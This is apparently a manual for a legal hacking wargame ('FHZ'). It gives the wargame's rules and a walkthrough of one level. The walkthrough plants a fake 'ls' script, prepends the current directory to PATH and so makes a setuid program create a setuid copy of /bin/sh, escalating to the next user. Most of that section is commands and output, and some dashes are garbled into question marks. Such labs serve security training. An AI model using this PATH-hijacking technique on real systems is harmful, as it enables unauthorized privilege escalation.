FHZ Manual Hints

In the FHZ, we will help to satisfy your intellectual curiosity without having to worry about the legal consequences of your actions.
We hope you will get the most out of our FHZ by applying your hacking skills and techniques. However, it is important that you observe the following rules:

  1. You are free.
    • Your actions are free from any restrictions in the FHZ.
    • You can compile or execute any programs.
    • However, you are prohibited from doing things which may block or interrupt the smooth process of other people's activities.

  2. Different ID and password are assigned for each level.
    • When you obtain a password for the next level, your level will be upgraded.
    • The FHZ consists of 15 levels.
    • When you have an EUID for the next level, you must execute the "/bin/pass" program and then you will get a password.

  3. Hints for level upgrading
    • You can get hints for level upgrading by visiting the FHZ homepage.

  4. Under no circumstances should you interfere or inconvenience other people's activities.

  5. Under no circumstances should you carry out DOS (Denial-of-Service) attacks.
    • Please note that DOS attacks from inside or outside the FHZ will prevent others from participating.



Here is an example of how an FHZ member, named Mr. X, successfully moved from level 2 to level 3.
HINT: There is a certain vulnerability in a hidden file that is located in the device driver directory. 
$ id

uid =1002(level2) gid=1002(level2)

$ whoami

level2

$ find /dev ?name ?perm -4000 -o -perm ?2000

/dev/haha

$ ls ?al /dev/haha

-rwsr--- 1 level3 level2 50052 Jun 18 20:33 /dev/haha

$ /dev/haha

Mr. X examines the file with setuid permission.

ls -al /var/tmp

total 2

drwxrwxrwt 2 root root 1024 Jul 20 11:44 ./

drwxr-xr-x 19 root root 1024 Jun 25 18:34 ../

prw------- 1 root root 0 Apr 1 04:38 taper00480eaa|

prw------- 1 root root 0 Apr 1 04:39 taper00480faa|

prw------- 1 root root 0 Apr 1 04:39 taper00480gaa|

prw------- 1 root root 0 Apr 1 04:47 taper00620eaa|

Here, Mr. X realized that if he executed the "haha" program, then the
ls ?al /var/tmp command would be executed. He was able to distinguish the absolute path from the relative path. Moreover, he thought that it would be dangerous to execute a program in the system through the relative path instead of the absolute path. For this reason, he goes on solving the problem expecting that he would be able to create holes by operating PATH variables.
$ cd /tmp

$ cat > ls << EOF

/bin/cp /bin/sh /tmp/sh

/bin/chmod 4755 /tmp/sh

EOF

$ chmod 755 /tmp/ls

$ ls ?al /tmp/ls

-rwxr-xr-x 1 level2 level2 47 Jul 26 16:00 /tmp/ls

First, make ls shell script. Next, run this shell script.
Then, you should get a shell.

$ PATH=.:$PATH

$ export PATH

Add current directory "." to environment variable PATH

$ /dev/haha

$ ls ?al /tmp/sh

-rwsr-xr-x 1 level3 level3 377992 Jun 20 16:30 /tmp/sh

$ /tmp/sh

$ id

uid =1002(level2) gid=1002(level2) euid=1003(level3)

This is how Mr. X got authentication to level 3.
To see the password for level 3, do the following: 

$ /bin/pass

123451234

123451234 - This is the password for level 3
Try to connect via telnet. 

$ telnet localhost

Trying 127.0.0.1...

Connected to localhost.

Escape character is '^]'.

ˇˇ

Login: level3

Password:

Last login: Mon Jul 26 15:31:37 from xxx.xxxx.xxx.xxx


Starting Hacking-free-zoneˇ¦ˇ¦